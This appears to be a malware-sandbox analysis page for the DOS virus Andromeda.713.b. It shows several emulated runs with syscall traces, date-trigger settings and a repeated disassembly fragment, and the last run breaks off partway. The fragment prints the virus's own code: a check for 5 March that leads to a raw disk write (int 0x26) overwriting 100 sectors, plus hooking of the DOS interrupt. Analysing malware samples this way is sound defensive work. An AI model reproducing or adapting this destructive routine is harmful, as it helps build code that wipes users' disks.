Sample viewer

vx.netlux.org/Virus.DOS.Andromeda.713.b

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:02:24.145196868Z 42 PC: 12bb6 | Get date 0x12bb6: cmp dl, 5
0x12bb9: jne 0x12bcd
0x12bbb: cmp dh, 3
0x12bbe: jne 0x12bcd
0x12bc0: mov al, 0
0x12bc2: mov cx, 0x64
0x12bc5: mov dx, 1
0x12bc8: mov bx, 0x100
0x12bcb: int 0x26
0x12bcd: mov si, 0x1234
0x12bd0: mov ah, 0x30
0x12bd2: int 0x21
0x12bd4: cmp di, -0x23
0x12bd7: jne 0x12bf1
0x12bd9: mov si, 0x3b7
0x12bdc: pop bx
0x12bdd: push bx
0x12bde: sub bx, 0x103
0x12be2: add si, bx
0x12be4: mov di, 0x100
2018-12-17T23:02:24.148049478Z 48 PC: 12bd4 | Get DOS version
2018-12-17T23:02:24.150421615Z 38 PC: 12c0d | Create PSP
2018-12-17T23:02:24.152447531Z 53 PC: 12c41 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T23:02:24.154458019Z 37 PC: 12c61 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T23:02:24.157194912Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-17T23:02:24.162175921Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14192,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:40:07.80647822Z 42 PC: 12bb6 | Get date 0x12bb6: cmp dl, 5
0x12bb9: jne 0x12bcd
0x12bbb: cmp dh, 3
0x12bbe: jne 0x12bcd
0x12bc0: mov al, 0
0x12bc2: mov cx, 0x64
0x12bc5: mov dx, 1
0x12bc8: mov bx, 0x100
0x12bcb: int 0x26
0x12bcd: mov si, 0x1234
0x12bd0: mov ah, 0x30
0x12bd2: int 0x21
0x12bd4: cmp di, -0x23
0x12bd7: jne 0x12bf1
0x12bd9: mov si, 0x3b7
0x12bdc: pop bx
0x12bdd: push bx
0x12bde: sub bx, 0x103
0x12be2: add si, bx
0x12be4: mov di, 0x100
2018-12-25T12:40:07.808848012Z 48 PC: 12bd4 | Get DOS version
2018-12-25T12:40:07.812926997Z 38 PC: 12c0d | Create PSP
2018-12-25T12:40:07.814217041Z 53 PC: 12c41 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:40:07.81569972Z 37 PC: 12c61 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:40:07.820637238Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:40:07.824346076Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":5,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14192,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:40:07.861435628Z 42 PC: 12bb6 | Get date 0x12bb6: cmp dl, 5
0x12bb9: jne 0x12bcd
0x12bbb: cmp dh, 3
0x12bbe: jne 0x12bcd
0x12bc0: mov al, 0
0x12bc2: mov cx, 0x64
0x12bc5: mov dx, 1
0x12bc8: mov bx, 0x100
0x12bcb: int 0x26
0x12bcd: mov si, 0x1234
0x12bd0: mov ah, 0x30
0x12bd2: int 0x21
0x12bd4: cmp di, -0x23
0x12bd7: jne 0x12bf1
0x12bd9: mov si, 0x3b7
0x12bdc: pop bx
0x12bdd: push bx
0x12bde: sub bx, 0x103
0x12be2: add si, bx
0x12be4: mov di, 0x100
2018-12-25T12:40:07.864666125Z 48 PC: 12bd4 | Get DOS version
2018-12-25T12:40:07.865815709Z 38 PC: 12c0d | Create PSP
2018-12-25T12:40:07.867172506Z 53 PC: 12c41 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:40:07.868428642Z 37 PC: 12c61 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:40:07.870515599Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:40:07.878019815Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":5,"Month":3,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14192,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:40:07.873981538Z 42 PC: 12bb6 | Get date 0x12bb6: cmp dl, 5
0x12bb9: jne 0x12bcd
0x12bbb: cmp dh, 3
0x12bbe: jne 0x12bcd
0x12bc0: mov al, 0
0x12bc2: mov cx, 0x64
0x12bc5: mov dx, 1
0x12bc8: mov bx, 0x100
0x12bcb: int 0x26
0x12bcd: mov si, 0x1234
0x12bd0: mov ah, 0x30
0x12bd2: int 0x21
0x12bd4: cmp di, -0x23
0x12bd7: jne 0x12bf1
0x12bd9: mov si, 0x3b7
0x12bdc: pop bx
0x12bdd: push bx
0x12bde: sub bx, 0x103
0x12be2: add si, bx
0x12be4: mov di, 0x100
2018-12-25T12:40:07.890464241Z 48 PC: 12bd4 | Get DOS version
2018-12-25T12:40:07.891984112Z 38 PC: 12c0d | Create PSP
2018-12-25T12:40:07.893710496Z 53 PC: 12c41 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:40:07.896648191Z 37 PC: 12c61 | Set interrupt vector (Interrupt = '33' AKA 'Random read')